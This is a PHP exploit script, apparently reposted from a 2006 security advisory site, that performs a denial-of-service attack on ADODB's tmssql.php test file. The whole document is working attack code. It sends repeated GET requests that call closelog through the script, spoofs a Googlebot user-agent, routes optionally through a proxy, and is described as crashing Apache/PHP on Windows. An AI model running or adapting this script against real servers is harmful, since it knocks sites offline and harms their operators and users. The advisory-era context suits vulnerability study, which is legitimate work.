Rated as : Moderate Risk
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "ADODB tmssql.php Denial of service\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path redo
OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to ADODB\r\n";
echo "redo: how many times?\r\n";
echo "Options:\r\n";
echo " -p[port]: specify a port other than 80\r\n";
echo " -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /some_app/
9999999\r\n";
echo "php ".$argv[0]." localhost /some_app/ 9999999
-p81\r\n";
echo "php ".$argv[0]." localhost /some_app/ 9999999
-P1.1.1.1:80\r\n";
die;
}
/*
tested against Apache/1.3.27 (Win32) PHP/4.3.3
closelog() func close the connection to the system logger, but if its
handle
is never initialized, Windows exception is raised by the php4ts.dll
module at address 0x00000000100bf014.
By sending multiple requests to the tmssql.php script, which allow
execution of an arbitrary function without arguments, this will cause
the Apache process to crash and to consume a large amount of memory
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n";
$exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port."\r\n";
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to
".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';
}
}
fputs($ock,$packet);
fclose($ock);
}
$host=$argv[1];$path=$argv[2];$redo=$argv[3];
$port=80;$proxy="";
for ($i=4; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo
'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
for ($i=1; $i<=$redo; $i++)
{
$packet ="GET
".$p."include/adodb/tests/tmssql.php?do=closelog
HTTP/1.0\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
echo $packet;
}
?>
securitydot.net - 2006-04-09
|
